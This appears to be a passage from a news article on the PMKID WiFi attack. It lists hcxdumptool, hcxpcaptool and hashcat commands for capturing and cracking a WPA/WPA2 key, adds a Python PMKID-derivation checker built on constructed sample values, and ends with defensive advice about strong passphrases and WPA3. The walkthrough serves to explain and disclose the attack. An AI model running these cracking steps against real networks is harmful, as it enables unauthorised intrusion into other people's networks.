Step 1 — An attacker can use a tool, like hcxdumptool (v4.2.0 or higher), to request the PMKID from the targeted access point and dump the received frame to a file.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
Step 2 — Using the hcxpcaptool tool, the output (in pcapng format) of the frame can then be converted into a hash format accepted by Hashcat.
$ ./hcxpcaptool -z test.16800 test.pcapng
Step 3 — Use the Hashcat (v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password, and Bingo!
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
The result is the password of the target wireless network; cracking it may take time depending on its length and complexity.
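To show what the mode-16800 line produced by hcxpcaptool contains and what each Hashcat guess actually checks, here is an added example (not code from the article or from the hcxtools/Hashcat projects) that derives the PMK and PMKID as 802.11i defines them and compares a candidate passphrase against a sample line; the MAC addresses, SSID and passphrase are constructed, and the point for defenders is that the only cost per guess is one PBKDF2 run, so passphrase entropy is the lever.

```python
import hashlib
import hmac

# Constructed sample network (not taken from the article); used only to build a
# mode-16800 line locally so the check below runs offline.
SAMPLE_AP_MAC = "aabbccddeeff"
SAMPLE_STA_MAC = "112233445566"
SAMPLE_ESSID = "example-net"
SAMPLE_PASSPHRASE = "correct horse battery staple"


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1 over the passphrase, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def make_16800_line(passphrase: str, essid: str, ap_mac_hex: str, sta_mac_hex: str) -> str:
    """Build a hashcat mode-16800 line: PMKID*AP_MAC*STA_MAC*ESSID(hex), as hcxpcaptool -z writes it."""
    pmk = derive_pmk(passphrase, essid)
    pmkid = derive_pmkid(pmk, bytes.fromhex(ap_mac_hex), bytes.fromhex(sta_mac_hex))
    return "*".join([pmkid.hex(), ap_mac_hex, sta_mac_hex, essid.encode().hex()])


def parse_16800_line(line: str):
    """Split a mode-16800 line into (pmkid, ap_mac, sta_mac, essid), rejecting malformed fields."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    if len(pmkid_hex) != 32 or len(ap_hex) != 12 or len(sta_hex) != 12:
        raise ValueError("malformed mode-16800 line")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(essid_hex).decode())


def passphrase_matches(line: str, candidate: str) -> bool:
    """One guess, as Hashcat performs it: re-derive the PMKID from the candidate and compare."""
    pmkid, ap, sta, essid = parse_16800_line(line)
    return hmac.compare_digest(derive_pmkid(derive_pmk(candidate, essid), ap, sta), pmkid)


if __name__ == "__main__":
    line = make_16800_line(SAMPLE_PASSPHRASE, SAMPLE_ESSID, SAMPLE_AP_MAC, SAMPLE_STA_MAC)
    print(line)
    print(passphrase_matches(line, SAMPLE_PASSPHRASE), passphrase_matches(line, "password"))
```

Nothing in the captured frame shortens the search: a wrong candidate costs the same 4096 PBKDF2 rounds as the right one, which is why a long random passphrase (or WPA3's SAE, which removes the offline check entirely) is the defence.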
"At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)," Steube said.
Since the new WiFi hack only works against networks with roaming functions enabled and requires attackers to brute-force the password, users are recommended to protect their WiFi network with a secure password that's difficult to crack.
This WiFi hack also does not work against the next-generation wireless security protocol WPA3, since the new protocol is "much harder to attack because of its modern key establishment protocol called 'Simultaneous Authentication of Equals' (SAE)."